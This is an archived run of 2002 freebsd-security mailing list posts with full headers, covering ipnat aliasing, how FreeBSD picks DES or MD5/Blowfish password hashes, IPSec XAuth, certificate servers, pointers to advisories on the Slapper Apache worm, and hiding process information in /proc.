0DDC643E6A; Thu, 26 Sep 2002 03:28:45 -0700 (PDT) (envelope-from le-hen_j@epita.fr) Received: from mel-rta8.wanadoo.fr (193.252.19.79) by mel-rto2.wanadoo.fr (6.5.007) id 3D89D999003EC090; Thu, 26 Sep 2002 12:28:32 +0200 Received: from darthvader (217.128.38.109) by mel-rta8.wanadoo.fr (6.5.007) id 3D8011E3007FFC1E; Thu, 26 Sep 2002 12:28:31 +0200 Message-ID: <056a01c26547$72e0be50$0200a8c0@darthvader> From: "jeremie le-hen" To: "billy" , "Juraj Petrik" Cc: , References: <20020925134615.V75126-100000@mouse.isilon.com> Subject: Re: IPNAT + IPFILTER + DUMMYNET + FreeBSD 4.7prerelease Date: Thu, 26 Sep 2002 12:28:25 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I know that ipnat will not redirect packets out the same interface they > came, but that doesn't seem to be a problem here. > the message That's not true. I've succeeded in using the same interface for incoming and outgoing packets through ipnat, using ip aliasing. Here is the configuration : # outgoing ip address ifconfig rl0 inet 10.251.21.32 netmask 0xFFFF0000 up # incoming one ifconfig rl0 inet 192.168.0.1 netmask 0xFFFFFF00 alias # ipnat rule map rl0 192.168.0.0/24 -> 10.251.21.32/32 I don't know if it works if outgoing ip address is on the same subnet as the incoming one, but i think yes. It would be useful if your network use an authentification to be allowed to go through your default router, and you don't have the relevant client software on some machines. This rule map rl0 10.251.21.41/32 -> 10.251.21.41/32 should work in my opinion. Regards, -- Jeremie Le Hen aka TataZ/TtZ le-hen_j@epita.fr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 3:44:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DCF4037B401 for ; Thu, 26 Sep 2002 03:44:45 -0700 (PDT) Received: from officepop3.tiscali.de (mxa.tiscali.de [194.162.162.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id BDCDE43E3B for ; Thu, 26 Sep 2002 03:44:44 -0700 (PDT) (envelope-from piontec@de.tiscali.com) Received: from hellskitchen.nacamar.de (azze.nacamar.de [195.63.228.105]) by officepop3.tiscali.de (Postfix) with ESMTP id 3021C5D2A; Thu, 26 Sep 2002 12:44:43 +0200 (CEST) Received: by hellskitchen.nacamar.de (Postfix, from userid 1000) id 2F9FE5A52C; Thu, 26 Sep 2002 12:44:51 +0200 (CEST) Date: Thu, 26 Sep 2002 12:44:50 +0200 From: Jan Wagner To: Olafur Osvaldsson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password encoding Message-ID: <20020926124450.A18244@de.tiscali.com> References: <200209260922.g8Q9MYR23427@sequel.rsm.ru> <20020926095550.GB10763@isnic.is> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020926095550.GB10763@isnic.is>; from oli@isnic.is on Thu, Sep 26, 2002 at 09:55:50AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Part of man : The algorithm used will depend upon whether crypt_set_format() has been called and whether a global default format has been specified. Unless a global default has been specified or crypt_set_format() has set the for- mat to something else, the built-in default format is used. This is cur- rently DES if it is available, or MD5 if not. How the salt is used will depend upon the algorithm for the hash. For best results, specify at least two characters of salt. The crypt_get_format() function returns a constant string that represents the name of the algorithm currently used. Valid values are `des', `blf' and `md5'. The crypt_set_format() function sets the default encoding format accord- ing to the supplied string. The global default format can be set using the /etc/auth.conf file using the `crypt_format' property. ... greets jw ps. man : (man auth.conf) && man 3 crypt && man 3 auth_getval(!!) On Thu, Sep 26, 2002 at 09:55:50AM +0000, Olafur Osvaldsson wrote: > Date: Thu, 26 Sep 2002 09:55:50 +0000 > From: Olafur Osvaldsson > To: Dmitry Agafonov > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Password encoding > In-Reply-To: <200209260922.g8Q9MYR23427@sequel.rsm.ru> > User-Agent: Mutt/1.3.28i > List-Archive: (Web Archive) > X-Loop: FreeBSD.org > X-OriginalArrivalTime: 26 Sep 2002 09:56:15.0528 (UTC) FILETIME=[F3F9DA80:01C26542] > > Dmitry, > You should be able to set it in /etc/auth.conf, but that doesn't work for me. > > You can instead run crypt_set_format("md5") to set the default for your prog > to md5 or blf for blowfish. > > You could also make sure that your salts start with $$ wich would then > set the algorithm used in encryption, more info on this in the crypt(3) manpage. > > /Oli > > On Thu, 26 Sep 2002, Dmitry Agafonov wrote: > > > Ok, how about more common question. How do I ask system crypt() to use MD5 > > by default? /etc/make.conf or such? > > > > -- > > Dmitry > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > Olafur Osvaldsson > Systems Administrator > Internet a Islandi hf. > Tel: +354 525-5291 > Email: oli@isnic.is > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 3:54:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8EC7337B401 for ; Thu, 26 Sep 2002 03:54:09 -0700 (PDT) Received: from officepop3.tiscali.de (mxa.tiscali.de [194.162.162.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0CB1C43E6A for ; Thu, 26 Sep 2002 03:54:09 -0700 (PDT) (envelope-from piontec@de.tiscali.com) Received: from hellskitchen.nacamar.de (azze.nacamar.de [195.63.228.105]) by officepop3.tiscali.de (Postfix) with ESMTP id 35E445D2A; Thu, 26 Sep 2002 12:54:07 +0200 (CEST) Received: by hellskitchen.nacamar.de (Postfix, from userid 1000) id CDDA85A52C; Thu, 26 Sep 2002 12:54:15 +0200 (CEST) Date: Thu, 26 Sep 2002 12:54:15 +0200 From: Jan Wagner To: Olafur Osvaldsson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password encoding Message-ID: <20020926125415.B4034@de.tiscali.com> References: <200209260922.g8Q9MYR23427@sequel.rsm.ru> <20020926095550.GB10763@isnic.is> <20020926124450.A18244@de.tiscali.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020926124450.A18244@de.tiscali.com>; from jan.wagner@de.tiscali.com on Thu, Sep 26, 2002 at 12:44:50PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ... arg! i forgott, maybe you should also take a look at http://quasar.mathstat.uottawa.ca/~selinger/ccrypt/ "ccrypt is a utility for encrypting and decrypting files and streams." "It was designed as a replacement for the standard unix crypt utility..." greets jw On Thu, Sep 26, 2002 at 12:44:50PM +0200, Jan Wagner wrote: > Date: Thu, 26 Sep 2002 12:44:50 +0200 > From: Jan Wagner > To: Olafur Osvaldsson > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Password encoding > User-Agent: Mutt/1.2.5.1i > In-Reply-To: <20020926095550.GB10763@isnic.is>; from oli@isnic.is on Thu, Sep 26, 2002 at 09:55:50AM +0000 > List-Archive: (Web Archive) > X-Loop: FreeBSD.org > X-OriginalArrivalTime: 26 Sep 2002 10:45:16.0902 (UTC) FILETIME=[CD2BE860:01C26549] > > Part of man : > > > The algorithm used will depend upon whether crypt_set_format() has been > called and whether a global default format has been specified. Unless a > global default has been specified or crypt_set_format() has set the for- > mat to something else, the built-in default format is used. This is cur- > rently DES if it is available, or MD5 if not. > > How the salt is used will depend upon the algorithm for the hash. For > best results, specify at least two characters of salt. > > The crypt_get_format() function returns a constant string that represents > the name of the algorithm currently used. Valid values are `des', `blf' > and `md5'. > > The crypt_set_format() function sets the default encoding format accord- > ing to the supplied string. > > The global default format can be set using the /etc/auth.conf file using > the `crypt_format' property. > > ... > > greets jw > > ps. man : (man auth.conf) && man 3 crypt && man 3 auth_getval(!!) > > On Thu, Sep 26, 2002 at 09:55:50AM +0000, Olafur Osvaldsson wrote: > > Date: Thu, 26 Sep 2002 09:55:50 +0000 > > From: Olafur Osvaldsson > > To: Dmitry Agafonov > > Cc: freebsd-security@FreeBSD.ORG > > Subject: Re: Password encoding > > In-Reply-To: <200209260922.g8Q9MYR23427@sequel.rsm.ru> > > User-Agent: Mutt/1.3.28i > > List-Archive: (Web Archive) > > X-Loop: FreeBSD.org > > X-OriginalArrivalTime: 26 Sep 2002 09:56:15.0528 (UTC) FILETIME=[F3F9DA80:01C26542] > > > > Dmitry, > > You should be able to set it in /etc/auth.conf, but that doesn't work for me. > > > > You can instead run crypt_set_format("md5") to set the default for your prog > > to md5 or blf for blowfish. > > > > You could also make sure that your salts start with $$ wich would then > > set the algorithm used in encryption, more info on this in the crypt(3) manpage. > > > > /Oli > > > > On Thu, 26 Sep 2002, Dmitry Agafonov wrote: > > > > > Ok, how about more common question. How do I ask system crypt() to use MD5 > > > by default? /etc/make.conf or such? > > > > > > -- > > > Dmitry > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > > Olafur Osvaldsson > > Systems Administrator > > Internet a Islandi hf. > > Tel: +354 525-5291 > > Email: oli@isnic.is > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 10:32: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C835E37B401 for ; Thu, 26 Sep 2002 10:31:59 -0700 (PDT) Received: from gaia.nimnet.asn.au (nimbin.lnk.telstra.net [139.130.45.143]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8933D43E4A for ; Thu, 26 Sep 2002 10:31:57 -0700 (PDT) (envelope-from smithi@nimnet.asn.au) Received: from localhost (smithi@localhost) by gaia.nimnet.asn.au (8.8.8/8.8.8R1.2) with SMTP id DAA13415; Fri, 27 Sep 2002 03:31:09 +1000 (EST) (envelope-from smithi@nimnet.asn.au) Date: Fri, 27 Sep 2002 03:31:08 +1000 (EST) From: Ian Smith To: Jan Wagner Cc: Olafur Osvaldsson , Dmitry Agafonov , freebsd-security@FreeBSD.ORG Subject: Re: Password encoding In-Reply-To: <20020926124450.A18244@de.tiscali.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Sep 2002, Jan Wagner wrote: > Part of man : > > The algorithm used will depend upon whether crypt_set_format() has been > called and whether a global default format has been specified. Unless a > global default has been specified or crypt_set_format() has set the for- > mat to something else, the built-in default format is used. This is cur- > rently DES if it is available, or MD5 if not. > > How the salt is used will depend upon the algorithm for the hash. For > best results, specify at least two characters of salt. > > The crypt_get_format() function returns a constant string that represents > the name of the algorithm currently used. Valid values are `des', `blf' > and `md5'. > > The crypt_set_format() function sets the default encoding format accord- > ing to the supplied string. > > The global default format can be set using the /etc/auth.conf file using > the `crypt_format' property. Interestingly (perhaps) on a 4.5 RELEASE box, man 3 crypt includes the section above as is, except for the very last line which instead says: the crypt_default property. Which was also as commented out in the 4.5-R /etc/auth.conf. So I added # crypt_default = md5 des crypt_default = md5 and now get md5 passwds as desired when using adduser, which had earlier created DES passwds - and someone else suggested was broken re this? I gather that this property was since renamed, as above, for 4.6? Cheers, Ian > greets jw > > ps. man : (man auth.conf) && man 3 crypt && man 3 auth_getval(!!) > > On Thu, Sep 26, 2002 at 09:55:50AM +0000, Olafur Osvaldsson wrote: [..] > > Dmitry, > > You should be able to set it in /etc/auth.conf, but that doesn't work for me. > > > > You can instead run crypt_set_format("md5") to set the default for your prog > > to md5 or blf for blowfish. > > > > You could also make sure that your salts start with $$ wich would then > > set the algorithm used in encryption, more info on this in the crypt(3) manpage. > > > > /Oli > > > > On Thu, 26 Sep 2002, Dmitry Agafonov wrote: > > > > > Ok, how about more common question. How do I ask system crypt() to use MD5 > > > by default? /etc/make.conf or such? > > > > > > -- > > > Dmitry > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > > Olafur Osvaldsson > > Systems Administrator > > Internet a Islandi hf. > > Tel: +354 525-5291 > > Email: oli@isnic.is [..] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 11:49:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AFE4C37B401 for ; Thu, 26 Sep 2002 11:49:17 -0700 (PDT) Received: from mail.crypton.pl (ns.crypton.pl [195.216.109.11]) by mx1.FreeBSD.org (Postfix) with SMTP id 5089243E42 for ; Thu, 26 Sep 2002 11:49:16 -0700 (PDT) (envelope-from mailman@mail.crypton.pl) Received: (qmail 65155 invoked by uid 1017); 26 Sep 2002 18:49:11 -0000 Date: Thu, 26 Sep 2002 20:49:11 +0200 From: Nomad To: Todor Genov Cc: freebsd-security@freebsd.org Subject: Re: Password encoding Message-ID: <20020926184911.GA65102@killer.crypton.pl> References: <20020925221718.GA63296@killer.crypton.pl> <20020925222645.GJ45330@techometer.net> <20020926100437.A47704@unix.za.net> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: inline In-Reply-To: <20020926100437.A47704@unix.za.net> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org O, that's nice: I haven't knew about that.Since I do like Blowfish I thought that there are only 2 possibilities in Free: crypto or md5. But the main problem is that passwd_format in my login.conf for default user (and new users were appended to that class) is and was "md5". But password encoding for new accounts was "des". When I added line "auth_default=md5" and changed passwords for those accounts by passwd then encoding format changed to md5. So: _without my knowledge_ passwords for new accounts were 8 characters long. On Thu, Sep 26, 2002 at 10:04:37AM +0200, Todor Genov wrote: > > You're going to want to do 2 things. First, make sure that you have your > > passwd_format=md5 in your /etc/login.conf (be sure to run cap_mkdb > > /etc/login.conf after you do so). > > FreeBSD has had support for blowfish passwords for quite some time now. Just > specify passwd_format=blf in login.conf. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Nomad [%% If you dance with devil %%] [%% you don't changing him. %%] [%% The devil is the one %%] [%% who is changing you. %%] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 18:10:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 29E8A37B401 for ; Thu, 26 Sep 2002 18:10:47 -0700 (PDT) Received: from mail.ipfw.org (CPE00105a1bd83d.cpe.net.cable.rogers.com [24.112.74.128]) by mx1.FreeBSD.org (Postfix) with ESMTP id C6BE243E4A for ; Thu, 26 Sep 2002 18:10:46 -0700 (PDT) (envelope-from webbie@ipfw.org) Received: from apollo.objtech.com (apollo.objtech.com [192.168.111.5]) by mail.ipfw.org (Postfix) with ESMTP id 99F47310C; Thu, 26 Sep 2002 21:10:45 -0400 (EDT) Date: Thu, 26 Sep 2002 21:10:45 -0400 From: Webbie X-Mailer: The Bat! (v1.60p) Reply-To: Webbie X-Priority: 3 (Normal) Message-ID: <7082011095.20020926211045@ipfw.org> To: Nomad Cc: freebsd-security@freebsd.org Subject: Re: Password encoding In-Reply-To: <20020925221718.GA63296@killer.crypton.pl> References: <20020925221718.GA63296@killer.crypton.pl> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org http://bsdvault.net/sections.php?op=viewarticle&artid=89 Wednesday, September 25, 2002, 6:17:19 PM, you wrote: N> Hello N> I'v upgraded my FreeBSD to 4.6.2 some time ago. Since that day I added some new accounts to my system. Everything was OK but... But some beautifull day I made mistake and I wrote shorter password N> than the good one. And what happend ? System let me in after succesful authorization !!! N> So I made small investigation. And what I found: new auth_default value in my system is DES !!! And my password on new accounts are only 8 characters long !!! N> If you'v done the same check your master.passwd if there are some DES encoded passwords. Because 8 character password without right password policy (with short paswords in mind) are VERY easy to N> brake. I know, I don't have to say that on this list, but writting about fundamental things is never in off. N> So, if I am alone with this problem: I am sorry, I'v had to done some mistake. N> But if not: so, I think that we have to do something with this... N> I upgraded my FreeBSD by buildworld/installworld from sources. -- Webbie \\|// (o o) +-------------------------oOOo-(_)-oOOo-----------------------------+ EMail : mailto:webbie(at)ipfw(dot)org PGP Key : http://www.ipfw.org/pgpkey.txt PGP Fingerprint: 1379 3D8A 024E 3C0E 1962 4E12 3742 0684 C29C 3537 +-------------------------------------------------------------------+ Out of cards on drive D: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 19:32:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B00D037B401 for ; Thu, 26 Sep 2002 19:32:38 -0700 (PDT) Received: from texas.pobox.com (texas.pobox.com [64.49.223.111]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DD7A43E65 for ; Thu, 26 Sep 2002 19:32:38 -0700 (PDT) (envelope-from stevesk@pobox.com) Received: from jenny.crlsca.adelphia.net (ca-crlsca-cuda1-c5a-a-55.crlsca.adelphia.net [68.70.214.55]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by texas.pobox.com (Postfix) with ESMTP id A7DA145362; Thu, 26 Sep 2002 22:32:32 -0400 (EDT) Received: by jenny.crlsca.adelphia.net (Postfix, from userid 500) id BB282A65; Thu, 26 Sep 2002 19:28:53 -0700 (PDT) Date: Thu, 26 Sep 2002 19:28:53 -0700 From: Kevin Steves To: Peter Jeremy Cc: freebsd-security@freebsd.org, stevesk@pobox.com Subject: Re: IPSec/XAuth Message-ID: <20020927022853.GD1654@jenny.crlsca.adelphia.net> References: <20020916064426.GA14444@gsmx07.alcatel.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020916064426.GA14444@gsmx07.alcatel.com.au> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Sep 16, 2002 at 04:44:26PM +1000, Peter Jeremy wrote: > Is anyone working on an XAuth implementation for IPSec? > For background information on XAuth, have a look at > http://www.nwfusion.com/news/tech/2000/0828tech.html > (This is nothing to do with X11 xauth). someone had code for freeswan (responder-only i think) but i don't know the latest news. check their list archives. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 2:59:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE9B937B406 for ; Fri, 27 Sep 2002 02:59:37 -0700 (PDT) Received: from chicken.orbitel.bg (chicken100.orbitel.bg [195.24.32.21]) by mx1.FreeBSD.org (Postfix) with SMTP id B73CB43E81 for ; Fri, 27 Sep 2002 02:59:35 -0700 (PDT) (envelope-from i.tanusheff@procreditbank.com) Received: (qmail 6834 invoked from network); 27 Sep 2002 09:59:33 -0000 Received: from unknown (HELO procreditbank.com) (212.95.179.198) by chicken.orbitel.bg with SMTP; 27 Sep 2002 09:59:33 -0000 Received: from itaush [172.16.248.250] by Proxy+; Fri, 27 Sep 2002 12:42:10 +0300 for multiple recipients From: "Ivailo Tanusheff" To: "FreeBSD Questions" , "FreeBSD Security" , "FreeBSD Net" Subject: PKI Date: Fri, 27 Sep 2002 12:42:10 +0300 Message-ID: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Do you know if there is any Certificate server available for FreeBSD? I need to issue certificates to our customers. Thank you in advantage,=A0 Ivailo Tanusheff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 3: 4:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4344737B401 for ; Fri, 27 Sep 2002 03:04:36 -0700 (PDT) Received: from liveson.bsd.st (12-254-133-23.client.attbi.com [12.254.133.23]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8C4F043E3B for ; Fri, 27 Sep 2002 03:04:35 -0700 (PDT) (envelope-from addicc@liveson.bsd.st) Received: from localhost (addicc@localhost) by liveson.bsd.st (8.11.6/8.11.6) with ESMTP id g8RA4VT99148 for ; Fri, 27 Sep 2002 04:04:32 -0600 (MDT) (envelope-from addicc@liveson.bsd.st) Date: Fri, 27 Sep 2002 04:04:31 -0600 (MDT) From: Dave To: freebsd-security@FreeBSD.org Subject: Apache Worm In-Reply-To: <20020926095550.GB10763@isnic.is> Message-ID: <20020927040135.J99146-100000@liveson.bsd.st> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I have noticed tons of people are getting that new Apache worm (mostly the Red-Hat Linux crowd?) Just wondering if anybody has seen a good link for more info on it. Anybody have a nice script to auto notify these people? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 3:36:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 613D037B401 for ; Fri, 27 Sep 2002 03:36:09 -0700 (PDT) Received: from omta01.mta.everyone.net (sitemail3.everyone.net [216.200.145.37]) by mx1.FreeBSD.org (Postfix) with ESMTP id 13C0043E42 for ; Fri, 27 Sep 2002 03:36:09 -0700 (PDT) (envelope-from mfrd@attitudex.com) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta01.mta.everyone.net (Postfix) with ESMTP id 9864A1C4074 for ; Fri, 27 Sep 2002 03:36:08 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id 66BD83B42; Fri, 27 Sep 2002 03:36:08 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Fri, 27 Sep 2002 03:36:08 -0700 (PDT) From: Muhammad Faisal Rauf Danka To: freebsd-security@FreeBSD.org Subject: Re: Apache Worm Reply-To: mfrd@attitudex.com X-Originating-Ip: [202.5.134.99] Message-Id: <20020927103608.66BD83B42@sitemail.everyone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org for info: http://www.cert.org/advisories/CA-2002-27.html http://www.symantec.com/avcenter/venc/data/linux.slapper.worm.html http://securityresponse.symantec.com/avcenter/security/Content/2002.09.13.html Not sure about any auto notification scripts though, but latest version of chkrootkit detects it. (www.chkrootkit.org) b0feebea67655daa440da92099dd5187 chkrootkit.tar.gz Regards -------- Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 --- Dave wrote: > >Hi, I have noticed tons of people are getting that new Apache worm (mostly >the Red-Hat Linux crowd?) Just wondering if anybody has seen a good >link for more info on it. Anybody have a nice script to auto notify these >people? > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Select your own custom email address for FREE! Get you@yourchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 3:55:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5583537B401 for ; Fri, 27 Sep 2002 03:55:15 -0700 (PDT) Received: from freebsd.org.ru (sweet.etrust.ru [194.84.67.5]) by mx1.FreeBSD.org (Postfix) with ESMTP id 701AD43E75 for ; Fri, 27 Sep 2002 03:55:14 -0700 (PDT) (envelope-from osa@freebsd.org.ru) Received: by freebsd.org.ru (Postfix, from userid 1000) id 5E59A2D6; Fri, 27 Sep 2002 14:55:12 +0400 (MSD) Date: Fri, 27 Sep 2002 14:55:12 +0400 From: "Sergey A. Osokin" To: Ivailo Tanusheff Cc: freebsd-security@freebsd.org Subject: Re: PKI Message-ID: <20020927105512.GB71352@freebsd.org.ru> References: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Sep 27, 2002 at 12:42:10PM +0300, Ivailo Tanusheff wrote: > > Do you know if there is any Certificate server available for FreeBSD? I > need to issue certificates to our customers. Sorry, but sertificate for what? "Must me used in goverment/military organisation" ? :-) -- Rgdz, /"\ ASCII RIBBON CAMPAIGN Sergey Osokin aka oZZ, \ / AGAINST HTML MAIL http://ozz.pp.ru/ X AND NEWS / \ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 4:32:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 95B3237B401 for ; Fri, 27 Sep 2002 04:32:16 -0700 (PDT) Received: from mail.crypton.pl (ns.crypton.pl [195.216.109.11]) by mx1.FreeBSD.org (Postfix) with SMTP id B6DD443E6A for ; Fri, 27 Sep 2002 04:32:12 -0700 (PDT) (envelope-from mailman@mail.crypton.pl) Received: (qmail 71510 invoked by uid 1017); 27 Sep 2002 11:32:00 -0000 Date: Fri, 27 Sep 2002 13:32:00 +0200 From: Nomad To: freebsd-security@freebsd.org Subject: kern.ps_showallprocs and procfs Message-ID: <20020927113200.GB71234@killer.crypton.pl> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Our's FreeBSD have nice possibility of hiding process informations of other users just by setting kern.ps_showallprocs=0. But there is one bad thing about it. For what we using it, when anybody can read all informations from /proc filesystem. And, as everybody knows, this filesystem contain information on ALL processes in system. So I was trying to protect this information by permissions manipulations but without possitive results. The only workaround is to umnount /proc and hash it in /etc/fstab, but I think it's not good idea to resolve this in only in that way. If somebody has some good solution to this problem: I'am ready to read about it. I working on FreeBSD 